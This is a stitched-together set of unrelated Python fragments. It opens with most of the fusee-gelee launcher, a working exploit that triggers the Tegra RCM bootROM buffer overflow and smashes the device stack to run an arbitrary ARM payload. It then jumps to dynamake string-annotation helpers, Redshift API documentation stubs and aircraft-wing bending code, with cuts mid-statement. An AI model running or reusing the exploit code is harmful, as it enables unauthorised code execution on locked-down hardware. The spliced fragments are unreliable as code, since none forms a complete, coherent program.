self.dev = self.libk.KUSB_DRIVER_API()
ret = self.lib.LibK_LoadDriverAPI(ctypes.byref(self.dev), device_info.contents.DriverID)
if ret == 0:
raise ctypes.WinError()
# Initialize the driver for use with our device
self.handle = self.libk.KUSB_HANDLE(None)
ret = self.dev.Init(ctypes.byref(self.handle), device_info)
if ret == 0:
raise self.libk.WinError()
return self.dev
def read(self, length):
""" Read using libusbK """
# Create the buffer to store what we read
buffer = ctypes.create_string_buffer(length)
len_transferred = ctypes.c_uint(0)
# Call libusbK's ReadPipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.ReadPipe(self.handle, ctypes.c_ubyte(0x81), ctypes.addressof(buffer), ctypes.c_uint(length), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
return buffer.raw
def write_single_buffer(self, data):
""" Write using libusbK """
# Copy construct to a bytearray so we Know™ what type it is
buffer = bytearray(data)
# Convert wrap the data for use with ctypes
cbuffer = (ctypes.c_ubyte * len(buffer))(*buffer)
len_transferred = ctypes.c_uint(0)
# Call libusbK's WritePipe using our specially-crafted function pointer and the opaque device handle
ret = self.dev.WritePipe(self.handle, ctypes.c_ubyte(0x01), cbuffer, len(data), ctypes.byref(len_transferred), None)
if ret == 0:
raise ctypes.WinError()
def ioctl(self, driver_handle: ctypes.c_void_p, ioctl_code: ctypes.c_ulong, input_bytes: ctypes.c_void_p, input_bytes_count: ctypes.c_size_t, output_bytes: ctypes.c_void_p, output_bytes_count: ctypes.c_size_t):
""" Wrapper for DeviceIoControl """
overlapped = self.libk.OVERLAPPED()
ctypes.memset(ctypes.addressof(overlapped), 0, ctypes.sizeof(overlapped))
ret = ctypes.windll.kernel32.DeviceIoControl(driver_handle, ioctl_code, input_bytes, input_bytes_count, output_bytes, output_bytes_count, None, ctypes.byref(overlapped))
# We expect this to error, which matches the others ^_^
if ret == False:
raise ctypes.WinError()
    def trigger_vulnerability(self, length):
        """
        Go over libusbK's head and get the master handle it's been using internally
        and perform a direct DeviceIoControl call to the kernel to skip the length check
        """
        # self.handle is KUSB_HANDLE, cast to KUSB_HANDLE_INTERNAL to transparent-ize it
        internal = ctypes.cast(self.handle, ctypes.POINTER(self.libk.KUSB_HANDLE_INTERNAL))
        # Get the handle libusbK has been secretly using in its ioctl calls this whole time
        master_handle = internal.contents.Device.contents.MasterDeviceHandle
        if master_handle is None or master_handle == self.libk.INVALID_HANDLE_VALUE:
            raise ValueError("Failed to initialize master handle")
        # the raw request struct is pretty annoying, so I'm just going to allocate enough memory and set the few fields I need
        raw_request = ctypes.create_string_buffer(self.RAW_REQUEST_STRUCT_SIZE)
        # set timeout to 1000 ms, timeout offset is 0 (since it's the first member), and it's an unsigned int
        timeout_p = ctypes.cast(raw_request, ctypes.POINTER(ctypes.c_uint))
        timeout_p.contents = ctypes.c_ulong(1000) # milliseconds
        # The status sub-struct sits at offset 4 — presumably right after the
        # timeout field; confirm against libusbK's raw request layout.
        status_p = ctypes.cast(ctypes.byref(raw_request, 4), ctypes.POINTER(self.libk.status_t))
        status_p.contents.index = self.GET_STATUS
        status_p.contents.recipient = self.TO_ENDPOINT
        # Oversized response buffer: its length is what smashes the stack.
        buffer = ctypes.create_string_buffer(length)
        code = self.win_ctrl_code(self.WINDOWS_FILE_DEVICE_UNKNOWN, self.LIBUSBK_FUNCTION_CODE_GET_STATUS, self.WINDOWS_METHOD_BUFFERED, self.WINDOWS_FILE_ANY_ACCESS)
        ret = self.ioctl(master_handle, ctypes.c_ulong(code), raw_request, ctypes.c_size_t(24), buffer, ctypes.c_size_t(length))
        # NOTE(review): self.ioctl returns None (it raises on failure), so this
        # check can never fire — confirm whether it was meant to inspect a status.
        if ret == False:
            raise ctypes.WinError()
class RCMHax:
    """
    Driver for the Tegra RCM exploit: tracks the bootROM's double-buffered
    USB copy state and delegates raw transfers to a platform backend.
    """
    # Default to the Nintendo Switch RCM VID and PID.
    DEFAULT_VID = 0x0955
    DEFAULT_PID = 0x7321
    # Exploit specifics
    COPY_BUFFER_ADDRESSES = [0x40005000, 0x40009000] # The addresses of the DMA buffers we can trigger a copy _from_.
    STACK_END = 0x40010000 # The address just after the end of the device's stack.
    def __init__(self, wait_for_device=False, os_override=None, vid=None, pid=None, override_checks=False):
        """ Set up our RCM hack connection."""
        # The first write into the bootROM touches the lowbuffer.
        self.current_buffer = 0
        # Keep track of the total amount written.
        self.total_written = 0
        # Create a vulnerability backend for the given device.
        try:
            self.backend = HaxBackend.create_appropriate_backend(system_override=os_override, skip_checks=override_checks)
        except IOError:
            print("It doesn't look like we support your OS, currently. Sorry about that!\n")
            sys.exit(-1)
        # Grab a connection to the USB device itself.
        self.dev = self._find_device(vid, pid)
        # If we don't have a device...
        if self.dev is None:
            # ... and we're allowed to wait for one, wait indefinitely for one to appear...
            if wait_for_device:
                print("Waiting for a TegraRCM device to come online...")
                while self.dev is None:
                    self.dev = self._find_device(vid, pid)
            # ... or bail out.
            else:
                raise IOError("No TegraRCM device found?")
        # Print any use-related warnings.
        self.backend.print_warnings()
        # Notify the user of which backend we're using.
        print("Identified a {} system; setting up the appropriate backend.".format(self.backend.BACKEND_NAME))
    def _find_device(self, vid=None, pid=None):
        """ Attempts to get a connection to the RCM device with the given VID and PID. """
        # Apply our default VID and PID if neither are provided...
        vid = vid if vid else self.DEFAULT_VID
        pid = pid if pid else self.DEFAULT_PID
        # ... and use them to find a USB device.
        return self.backend.find_device(vid, pid)
    def read(self, length):
        """ Reads data from the RCM protocol endpoint. """
        return self.backend.read(length)
    def write(self, data):
        """ Writes data to the main RCM protocol endpoint. """
        length = len(data)
        # Transmit in 0x1000-byte chunks, mirroring the bootROM's buffer size.
        packet_size = 0x1000
        while length:
            data_to_transmit = min(length, packet_size)
            length -= data_to_transmit
            chunk = data[:data_to_transmit]
            data = data[data_to_transmit:]
            self.write_single_buffer(chunk)
    def write_single_buffer(self, data):
        """
        Writes a single RCM buffer, which should be 0x1000 long.
        The last packet may be shorter, and should trigger a ZLP (e.g. not divisible by 512).
        If it's not, send a ZLP.
        """
        # NOTE(review): no ZLP is sent here despite the docstring — presumably
        # the backend handles it; confirm.
        self._toggle_buffer()
        return self.backend.write_single_buffer(data)
    def _toggle_buffer(self):
        """
        Toggles the active target buffer, paralleling the operation happening in
        RCM on the X1 device.
        """
        self.current_buffer = 1 - self.current_buffer
    def get_current_buffer_address(self):
        """ Returns the base address for the current copy. """
        return self.COPY_BUFFER_ADDRESSES[self.current_buffer]
    def read_device_id(self):
        """ Reads the Device ID via RCM. Only valid at the start of the communication. """
        return self.read(16)
    def switch_to_highbuf(self):
        """ Switches to the higher RCM buffer, reducing the amount that needs to be copied. """
        # Writing one full buffer flips the device (and our mirror) to the high buffer.
        if self.get_current_buffer_address() != self.COPY_BUFFER_ADDRESSES[1]:
            self.write(b'\0' * 0x1000)
    def trigger_controlled_memcpy(self, length=None):
        """ Triggers the RCM vulnerability, causing it to make a signficantly-oversized memcpy. """
        # Determine how much we'd need to transmit to smash the full stack.
        if length is None:
            length = self.STACK_END - self.get_current_buffer_address()
        return self.backend.trigger_vulnerability(length)
def parse_usb_id(id):
    """ Parse a VID/PID command-line argument given as a hexadecimal string. """
    return int(id, base=16)
# Read our arguments.
parser = argparse.ArgumentParser(description='launcher for the fusee gelee exploit (by @ktemkin)')
parser.add_argument('payload', metavar='payload', type=str, help='ARM payload to be launched; should be linked at 0x40010000')
parser.add_argument('-w', dest='wait', action='store_true', help='wait for an RCM connection if one isn\'t present')
parser.add_argument('-V', metavar='vendor_id', dest='vid', type=parse_usb_id, default=None, help='overrides the TegraRCM vendor ID')
parser.add_argument('-P', metavar='product_id', dest='pid', type=parse_usb_id, default=None, help='overrides the TegraRCM product ID')
parser.add_argument('--override-os', metavar='platform', dest='platform', type=str, default=None, help='overrides the detected OS; for advanced users only')
parser.add_argument('--relocator', metavar='binary', dest='relocator', type=str, default="%s/intermezzo.bin" % os.path.dirname(os.path.abspath(__file__)), help='provides the path to the intermezzo relocation stub')
parser.add_argument('--override-checks', dest='skip_checks', action='store_true', help="don't check for a supported controller; useful if you've patched your EHCI driver")
parser.add_argument('--allow-failed-id', dest='permissive_id', action='store_true', help="continue even if reading the device's ID fails; useful for development but not for end users")
arguments = parser.parse_args()
# Expand out the payload path to handle any user references (e.g. "~").
payload_path = os.path.expanduser(arguments.payload)
if not os.path.isfile(payload_path):
    print("Invalid payload path specified!")
    sys.exit(-1)
# Find our intermezzo relocator...
intermezzo_path = os.path.expanduser(arguments.relocator)
if not os.path.isfile(intermezzo_path):
    print("Could not find the intermezzo interposer. Did you build it?")
    sys.exit(-1)
# Get a connection to our device.
try:
    switch = RCMHax(wait_for_device=arguments.wait, vid=arguments.vid,
            pid=arguments.pid, os_override=arguments.platform, override_checks=arguments.skip_checks)
except IOError as e:
    print(e)
    sys.exit(-1)
# Print the device's ID. Note that reading the device's ID is only valid at
# the start of communication, before any payload data is sent.
try:
    device_id = switch.read_device_id()
    print("Found a Tegra with Device ID: {}".format(device_id))
except OSError as e:
    # Raise the exception only if we're not being permissive about ID reads.
    if not arguments.permissive_id:
        raise e
# Prefix the image with an RCM command, so it winds up loaded into memory
# at the right location (0x40010000).
# Use the maximum length accepted by RCM, so we can transmit as much payload as
# we want; we'll take over before we get to the end.
length = 0x30298
payload = length.to_bytes(4, byteorder='little')
# pad out to 680 so the payload starts at the right address in IRAM
payload += b'\0' * (680 - len(payload))
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
# Include the Intermezzo binary in the command stream. This | |
from each_string(*strings)
def flatten(*args: Strings) -> List[str]:
    """
    Collect every string produced by :py:func:`each_string` into one flat list.
    """
    return [*each_string(*args)]
class AnnotatedStr(str):
    """
    A wrapper containing optional annotations.

    Behaves exactly like ``str``; the extra boolean flags record how the
    string was annotated so downstream code can adjust its handling.
    """
    #: Whether this was annotated by :py:func:`dynamake.optional`.
    optional = False
    #: Whether this was annotated by :py:func:`dynamake.phony`.
    phony = False
    #: Whether this was annotated by :py:func:`dynamake.exists`.
    exists = False
    #: Whether this was annotated by :py:func:`dynamake.precious`.
    precious = False
def _dump_str(dumper: Dumper, data: AnnotatedStr) -> Node:
    """Represent an annotated string as a plain YAML string scalar (annotations are dropped)."""
    return dumper.represent_scalar("tag:yaml.org,2002:str", data)
# Make YAML serialize AnnotatedStr values exactly like ordinary strings.
yaml.add_representer(AnnotatedStr, _dump_str)
def copy_annotations(source: str, target: str) -> str:
    """
    Copy the annotations from one string to another.

    Returns the annotated target string. If the source carries no annotations,
    the target is returned unchanged.
    """
    if isinstance(source, AnnotatedStr):
        if not isinstance(target, AnnotatedStr):
            target = AnnotatedStr(target)
        for flag in ("optional", "exists", "phony", "precious"):
            setattr(target, flag, getattr(source, flag))
    return target
def is_optional(string: str) -> bool:
    """
    Whether a string has been annotated as :py:func:`dynamake.optional`.
    """
    if not isinstance(string, AnnotatedStr):
        return False
    return string.optional
def is_exists(string: str) -> bool:
    """
    Whether a string has been annotated as :py:func:`dynamake.exists`-only.
    """
    if not isinstance(string, AnnotatedStr):
        return False
    return string.exists
def is_phony(string: str) -> bool:
    """
    Whether a string has been annotated as :py:func:`dynamake.phony`.
    """
    if not isinstance(string, AnnotatedStr):
        return False
    return string.phony
def is_precious(string: str) -> bool:
    """
    Whether a string has been annotated as :py:func:`dynamake.precious`.
    """
    if not isinstance(string, AnnotatedStr):
        return False
    return string.precious
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def fmt_capture(wildcards: Dict[str, Any], pattern: str) -> str:
    ...
@overload
def fmt_capture(wildcards: Dict[str, Any], not_pattern: NotString) -> List[str]:
    ...
@overload
def fmt_capture(wildcards: Dict[str, Any], first: Strings, second: Strings, *patterns: Strings) -> List[str]:
    ...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def fmt_capture(kwargs: Any, *patterns: Any) -> Any:  # type: ignore
    """
    Format one or more capture patterns using the specified values.

    This is different from invoking ``pattern.format(**kwargs)`` on each pattern because ``format`` would be confused by
    the ``{*name}`` captures in the pattern(s). In contrast, ``fmt_capture`` will expand such directives, as long as the
    ``name`` does not start with ``_``.

    Annotations on each input pattern are carried over to its formatted result.
    A single ``str`` argument yields a single ``str``; otherwise a list is returned.
    """
    results = [copy_annotations(pattern, _fmt_capture(kwargs, pattern)) for pattern in each_string(*patterns)]
    if len(patterns) == 1 and isinstance(patterns[0], str):
        assert len(results) == 1
        return results[0]
    return results
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def optional(pattern: str) -> str:
    ...
@overload
def optional(not_string: NotString) -> List[str]:
    ...
@overload
def optional(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
    ...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def optional(*patterns: Any) -> Any:  # type: ignore
    """
    Annotate patterns as optional (for use in action ``input`` and/or ``output``).

    An optional input is allowed not to exist before the action is executed,
    which is useful when the action responds to the files but can execute
    without them.  An optional output is allowed not to exist after the action
    is executed, which is useful to ensure such outputs are removed following
    a failed execution, or before a new execution.
    """
    annotated: List[str] = []
    for string in each_string(*patterns):
        # Wrap plain strings so the annotation flag has somewhere to live.
        if not isinstance(string, AnnotatedStr):
            string = AnnotatedStr(string)
        string.optional = True
        annotated.append(string)
    # A single plain-string argument yields a single string result.
    if len(patterns) == 1 and isinstance(patterns[0], str):
        assert len(annotated) == 1
        return annotated[0]
    return annotated
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def exists(pattern: str) -> str:
    ...
@overload
def exists(not_string: NotString) -> List[str]:
    ...
@overload
def exists(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
    ...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def exists(*patterns: Any) -> Any:  # type: ignore
    """
    Annotate patterns as exist-only (for use in action ``input`` and/or ``output``).

    An exist-only input is only required to exist; its modification date is
    ignored.  Directories are always treated this way because modification
    dates on directories are unreliable.  An exist-only output is not touched
    following the execution: the action ensures the file will exist but may
    choose to leave it unmodified.
    """
    annotated: List[str] = []
    for string in each_string(*patterns):
        # Wrap plain strings so the annotation flag has somewhere to live.
        if not isinstance(string, AnnotatedStr):
            string = AnnotatedStr(string)
        string.exists = True
        annotated.append(string)
    # A single plain-string argument yields a single string result.
    if len(patterns) == 1 and isinstance(patterns[0], str):
        assert len(annotated) == 1
        return annotated[0]
    return annotated
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def phony(pattern: str) -> str:
    ...
@overload
def phony(not_string: NotString) -> List[str]:
    ...
@overload
def phony(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
    ...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def phony(*patterns: Any) -> Any:  # type: ignore
    """
    Annotate patterns as phony (for use in action ``input`` and/or ``output``).

    A phony target does not exist as a disk file.  When required as an input,
    its producer step is always executed, and the dependent step always
    executes its sub-processes.
    """
    annotated: List[str] = []
    for string in each_string(*patterns):
        # Wrap plain strings so the annotation flag has somewhere to live.
        if not isinstance(string, AnnotatedStr):
            string = AnnotatedStr(string)
        string.phony = True
        annotated.append(string)
    # A single plain-string argument yields a single string result.
    if len(patterns) == 1 and isinstance(patterns[0], str):
        assert len(annotated) == 1
        return annotated[0]
    return annotated
# pylint: disable=missing-docstring,pointless-statement,multiple-statements,unused-argument
@overload
def precious(pattern: str) -> str:
    ...
@overload
def precious(not_string: NotString) -> List[str]:
    ...
@overload
def precious(first: Strings, second: Strings, *patterns: Strings) -> List[str]:
    ...
# pylint: enable=missing-docstring,pointless-statement,multiple-statements,unused-argument
def precious(*patterns: Any) -> Any:  # type: ignore
    """
    Annotate patterns as precious (for use in action ``output``).

    A precious output is never deleted.  This covers both deletion of "stale"
    outputs before an action is run and deletion of "failed" outputs after an
    action has failed.
    """
    annotated: List[str] = []
    for string in each_string(*patterns):
        # Wrap plain strings so the annotation flag has somewhere to live.
        if not isinstance(string, AnnotatedStr):
            string = AnnotatedStr(string)
        string.precious = True
        annotated.append(string)
    # A single plain-string argument yields a single string result.
    if len(patterns) == 1 and isinstance(patterns[0], str):
        assert len(annotated) == 1
        return annotated[0]
    return annotated
class Captured:
    """
    The results of operations using a capture pattern.

    A capture pattern is similar to a glob pattern, except that every wildcard
    match must be written inside ``{...}``:

    * ``{*name}`` has the same effect as ``*``; the matching substring is
      captured under the key ``name``.
    * ``/{**name}/`` has the same effect as ``/**/``; the matching substring
      is captured under the key ``name``.

    If ``name`` starts with ``_`` the matching substring is discarded instead
    of captured.  If ``name`` is followed by ``:`` it must be followed by the
    actual glob pattern; that is, ``{*name}`` is shorthand for ``{*name:*}``
    and ``{**name}`` is shorthand for ``{*name:**}``.  This allows arbitrary
    match patterns (for example ``{*digit:[0-9]}`` captures a single decimal
    digit).
    """
    def __init__(self) -> None:
        """
        Create an empty capture results.
        """
        #: The list of existing paths that matched the capture pattern.
        self.paths: List[str] = []
        #: The list of wildcard values captured from the matched paths.
        self.wildcards: List[Dict[str, Any]] = []
class NonOptionalException(Exception):
    """
    Exception raised when a non-optional pattern did not match any disk files.
    """
    def __init__(self, glob: str, capture: str) -> None:
        """
        Create a new exception when no disk files matched the pattern.
        """
        if glob == capture:
            message = f"No files matched the non-optional glob pattern: {glob}"
        else:
            message = f"No files matched the non-optional glob: {glob} pattern: {capture}"
        super().__init__(message)
        #: The glob pattern that failed to match.
        self.glob = glob
def glob_capture(*patterns: Strings) -> Captured:
"""
Given capture pattern, return the :py:class:`dynamake.Captured` information (paths and captured values).
**Parameters**
capture
The pattern may contain ``...{*captured_name}...``, as well as normal ``glob`` patterns (``*``, ``**``). The
``...{name}..`` is expanded using the provided ``wildcards``. The ``*`` and ``**`` are ``glob``-ed. A capture
expression will cause the matching substring to be collected in a list of dictionaries (one per matching
existing path name). Valid capture patterns are:
* ``...{*captured_name}...`` is treated as if it was a ``*`` glob pattern, and the matching zero or more
characters are entered into the dictionary under the ``captured_name`` key.
* ``...{*captured_name:pattern}...`` is similar but allows you to explicitly specify the glob pattern capture it
under the key ``foo``.
* ``...{**captured_name}...`` is a shorthand for ``...{*captured_name:**}...``. That is, it acts similarly to
``...{*captured_name}...`` except that the glob pattern is ``**``.
.. note::
Do not use the ``{*foo:**}`` form. There's some special treatment for the ``{**foo}`` form as it can expand
to the empty string. In particular, it is expected to always be used between ``/`` characters, as in
``.../{**foo}/...``, and may expand to either no directory name, a single directory name, or a sequence of
directory names.
If a pattern is not annotated with :py:func:`dynamake.optional` and it matches no existing files, an error is
raised.
**Returns**
Captured
The list of existing file paths that match the patterns, and the list of dictionaries with the captured values
for each such path. The annotations (:py:class:`dynamake.AnnotatedStr`) of the pattern are copied to the paths
expanded from | |
point for the next set of response records in a subsequent request. If a value is returned in a response, you can retrieve the next set of records by providing this returned marker value in the ``marker`` parameter and retrying the command. If the ``marker`` field is empty, all response records have been retrieved for the request.
:type ClusterIdentifier: string
:param ClusterIdentifier:
The unique identifier for the cluster whose snapshot schedules you want to view.
:type ScheduleIdentifier: string
:param ScheduleIdentifier:
A unique identifier for a snapshot schedule.
:type TagKeys: list
:param TagKeys:
The key value for a snapshot schedule tag.
- *(string) --*
:type TagValues: list
:param TagValues:
The value corresponding to the key of the snapshot schedule tag.
- *(string) --*
:type Marker: string
:param Marker:
A value that indicates the starting point for the next set of response records in a subsequent request. If a value is returned in a response, you can retrieve the next set of records by providing this returned marker value in the ``marker`` parameter and retrying the command. If the ``marker`` field is empty, all response records have been retrieved for the request.
:type MaxRecords: integer
:param MaxRecords:
The maximum number or response records to return in each call. If the number of remaining response records exceeds the specified ``MaxRecords`` value, a value is returned in a ``marker`` field of the response. You can retrieve the next set of records by retrying the command with the returned ``marker`` value.
:rtype: dict
:returns:
"""
pass
def describe_storage(self) -> Dict:
    """
    Returns the total amount of snapshot usage and provisioned storage for a user in megabytes.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeStorage>`_
    **Request Syntax**
    ::
        response = client.describe_storage()
    **Response Syntax**
    ::
        {
            'TotalBackupSizeInMegaBytes': 123.0,
            'TotalProvisionedStorageInMegaBytes': 123.0
        }
    **Response Structure**
    - *(dict) --*
      - **TotalBackupSizeInMegaBytes** *(float) --*
        The total amount of storage currently used for snapshots.
      - **TotalProvisionedStorageInMegaBytes** *(float) --*
        The total amount of storage currently provisioned.
    :rtype: dict
    :returns:
    """
    # Auto-generated documentation stub: the concrete request/response
    # handling is injected dynamically by botocore at runtime.
    pass
def describe_table_restore_status(self, ClusterIdentifier: str = None, TableRestoreRequestId: str = None, MaxRecords: int = None, Marker: str = None) -> Dict:
    """
    Lists the status of one or more table restore requests made using the RestoreTableFromClusterSnapshot API action. If you don't specify a value for the ``TableRestoreRequestId`` parameter, then ``DescribeTableRestoreStatus`` returns the status of all table restore requests ordered by the date and time of the request in ascending order. Otherwise ``DescribeTableRestoreStatus`` returns the status of the table specified by ``TableRestoreRequestId`` .
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeTableRestoreStatus>`_
    **Request Syntax**
    ::
        response = client.describe_table_restore_status(
            ClusterIdentifier='string',
            TableRestoreRequestId='string',
            MaxRecords=123,
            Marker='string'
        )
    **Response Syntax**
    ::
        {
            'TableRestoreStatusDetails': [
                {
                    'TableRestoreRequestId': 'string',
                    'Status': 'PENDING'|'IN_PROGRESS'|'SUCCEEDED'|'FAILED'|'CANCELED',
                    'Message': 'string',
                    'RequestTime': datetime(2015, 1, 1),
                    'ProgressInMegaBytes': 123,
                    'TotalDataInMegaBytes': 123,
                    'ClusterIdentifier': 'string',
                    'SnapshotIdentifier': 'string',
                    'SourceDatabaseName': 'string',
                    'SourceSchemaName': 'string',
                    'SourceTableName': 'string',
                    'TargetDatabaseName': 'string',
                    'TargetSchemaName': 'string',
                    'NewTableName': 'string'
                },
            ],
            'Marker': 'string'
        }
    **Response Structure**
    - *(dict) --*
      - **TableRestoreStatusDetails** *(list) --*
        A list of status details for one or more table restore requests.
        - *(dict) --*
          Describes the status of a RestoreTableFromClusterSnapshot operation.
          - **TableRestoreRequestId** *(string) --*
            The unique identifier for the table restore request.
          - **Status** *(string) --*
            A value that describes the current state of the table restore request.
            Valid Values: ``SUCCEEDED`` , ``FAILED`` , ``CANCELED`` , ``PENDING`` , ``IN_PROGRESS``
          - **Message** *(string) --*
            A description of the status of the table restore request. Status values include ``SUCCEEDED`` , ``FAILED`` , ``CANCELED`` , ``PENDING`` , ``IN_PROGRESS`` .
          - **RequestTime** *(datetime) --*
            The time that the table restore request was made, in Universal Coordinated Time (UTC).
          - **ProgressInMegaBytes** *(integer) --*
            The amount of data restored to the new table so far, in megabytes (MB).
          - **TotalDataInMegaBytes** *(integer) --*
            The total amount of data to restore to the new table, in megabytes (MB).
          - **ClusterIdentifier** *(string) --*
            The identifier of the Amazon Redshift cluster that the table is being restored to.
          - **SnapshotIdentifier** *(string) --*
            The identifier of the snapshot that the table is being restored from.
          - **SourceDatabaseName** *(string) --*
            The name of the source database that contains the table being restored.
          - **SourceSchemaName** *(string) --*
            The name of the source schema that contains the table being restored.
          - **SourceTableName** *(string) --*
            The name of the source table being restored.
          - **TargetDatabaseName** *(string) --*
            The name of the database to restore the table to.
          - **TargetSchemaName** *(string) --*
            The name of the schema to restore the table to.
          - **NewTableName** *(string) --*
            The name of the table to create as a result of the table restore request.
      - **Marker** *(string) --*
        A pagination token that can be used in a subsequent DescribeTableRestoreStatus request.
    :type ClusterIdentifier: string
    :param ClusterIdentifier:
      The Amazon Redshift cluster that the table is being restored to.
    :type TableRestoreRequestId: string
    :param TableRestoreRequestId:
      The identifier of the table restore request to return status for. If you don\'t specify a ``TableRestoreRequestId`` value, then ``DescribeTableRestoreStatus`` returns the status of all in-progress table restore requests.
    :type MaxRecords: integer
    :param MaxRecords:
      The maximum number of records to include in the response. If more records exist than the specified ``MaxRecords`` value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    :type Marker: string
    :param Marker:
      An optional pagination token provided by a previous ``DescribeTableRestoreStatus`` request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by the ``MaxRecords`` parameter.
    :rtype: dict
    :returns:
    """
    # Auto-generated documentation stub: the concrete request/response
    # handling is injected dynamically by botocore at runtime.
    pass
def describe_tags(self, ResourceName: str = None, ResourceType: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None) -> Dict:
"""
Returns a list of tags. You can return tags from a specific resource by specifying an ARN, or you can return all tags for a given type of resource, such as clusters, snapshots, and so on.
The following are limitations for ``DescribeTags`` :
* You cannot specify an ARN and a resource-type value together in the same request.
* You cannot use the ``MaxRecords`` and ``Marker`` parameters together with the ARN parameter.
* The ``MaxRecords`` parameter can be a range from 10 to 50 results to return in a request.
If you specify both tag keys and tag values in the same request, Amazon Redshift returns all resources that match any combination of the specified keys and values. For example, if you have ``owner`` and ``environment`` for tag keys, and ``admin`` and ``test`` for tag values, all resources that have any combination of those values are returned.
If both tag keys and values are omitted from the request, resources are returned regardless of whether they have tag keys or values associated with them.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeTags>`_
**Request Syntax**
::
response = client.describe_tags(
ResourceName='string',
ResourceType='string',
MaxRecords=123,
Marker='string',
TagKeys=[
'string',
],
TagValues=[
'string',
]
)
**Response Syntax**
::
{
'TaggedResources': [
{
'Tag': {
'Key': 'string',
'Value': 'string'
},
'ResourceName': 'string',
'ResourceType': 'string'
},
],
'Marker': 'string'
}
**Response Structure**
- *(dict) --*
- **TaggedResources** *(list) --*
A list of tags with their associated resources.
- *(dict) --*
A tag and its associated resource.
- **Tag** *(dict) --*
The tag for the resource.
- **Key** *(string) --*
The key, or name, for the resource tag.
- **Value** *(string) --*
The value for the resource tag.
- **ResourceName** *(string) --*
The Amazon Resource Name (ARN) with which the tag is associated, for example: ``arn:aws:redshift:us-east-1:123456789:cluster:t1`` .
- **ResourceType** *(string) --*
The type of resource with which the tag is associated. Valid resource types are:
* | |
1.0/(1.0+np.exp(-a*x-2))
y2 = 1.0 + a/4*x
rr = x < -2/a
return rr*y1 + (1-rr)*y2
def bend(self, i_sec0: int, i_sec1: int, leader=None, kx=None, ky=None, kc=None, rot_x=False):
    '''
    Bend surfaces by a guide curve, i.e., leader.

    >>> bend(i_sec0: int, i_sec1: int, leader=None,
    >>>      kx=None, ky=None, kc=None, rot_x=False)

    ### Inputs:
    ```text
    i_sec0: the index of start section
    i_sec1: the index of end section
    leader: list of points (and chord length) in the guide curve.
            [[x,y,z(,c)], [x,y,z(,c)], ...]
    axis:   Z-axis, spanwise direction
    kx:     X-axis slope (dx/dz) at both ends [kx0, kx1]
    ky:     Y-axis slope (dy/dz) at both ends [ky0, ky1]
    kc:     Chord slope (dc/dz) at both ends [kc0, kc1]
    rot_x:  if True, rotate sections in x-axis to
            make the section vertical to the leader
    ```

    ### Note:
    ```text
    The leader is a list of points to define the spline curve that
    describes the leading edge curve.
    Regenerate the surface between section i_sec0 and i_sec1
    X is the flow direction (chord direction)
    ```
    '''
    if self.l2d:
        print('No bending for 2D cases')
        return

    def sortZ(loc):
        # Sort key: spanwise (z) coordinate of a leader point.
        return loc[2]

    #* Control points of the leader curve
    # The chord is splined along the span only when requested (kc given)
    # or when the provided leader points already carry a chord value.
    leader_points = []
    spline_chord = False
    if kc is not None:
        spline_chord = True
    elif leader is not None and len(leader[0]) == 4:
        spline_chord = True

    if spline_chord:
        for i in range(i_sec0, i_sec1 + 1):
            leader_points.append([self.secs[i].xLE, self.secs[i].yLE, self.secs[i].zLE, self.secs[i].chord])
    else:
        for i in range(i_sec0, i_sec1 + 1):
            leader_points.append([self.secs[i].xLE, self.secs[i].yLE, self.secs[i].zLE])

    #* Manually provided leader points
    if leader is not None:
        if (spline_chord and len(leader[0]) == 4) or (not spline_chord and len(leader[0]) == 3):
            # Need c and provide c // Don't need c and have no c
            for point in leader:
                leader_points.append(point)
        elif spline_chord and len(leader[0]) == 3:
            # Need c but have no c: interpolate the chord from the sections.
            # NOTE: this appends the chord to the caller's point lists in place.
            for point in leader:
                chord = self.linear_interpolate_z(point[2], key='chord')
                # BUG FIX: list.append returns None; the previous
                # 'point_ = point.append(chord)' bound a useless None.
                point.append(chord)
                leader_points.append(point)
        else:
            print('spline_chord', spline_chord)
            print('len(leader[0])', len(leader[0]))
            print('kc', kc)
            raise Exception('Should not happen')

    leader_points.sort(key=sortZ)
    n_point = len(leader_points)

    #* Generating leader curve
    u = np.zeros(n_point)   # independent variable list (z, spanwise)
    v = np.zeros(n_point)   # dependent variable list (x)
    w = np.zeros(n_point)   # dependent variable list (y)
    c = np.zeros(n_point)   # chord list
    for i in range(n_point):
        u[i] = leader_points[i][2]  # z
        v[i] = leader_points[i][0]  # x
        w[i] = leader_points[i][1]  # y
        if spline_chord:
            c[i] = leader_points[i][3]  # chord

    # Cubic splines along the span; end slopes are clamped when provided
    # (bc_type (1, slope) fixes the first derivative at each end).
    if kx is None:
        leader_x = CubicSpline(u, v)
    else:
        leader_x = CubicSpline(u, v, bc_type=((1, kx[0]), (1, kx[1])))
    if ky is None:
        leader_y = CubicSpline(u, w)
    else:
        leader_y = CubicSpline(u, w, bc_type=((1, ky[0]), (1, ky[1])))
    if spline_chord and kc is None:
        leader_c = CubicSpline(u, c)
    elif kc is not None:
        leader_c = CubicSpline(u, c, bc_type=((1, kc[0]), (1, kc[1])))

    #* Bend surfaces
    i0 = i_sec0
    i1 = i_sec1
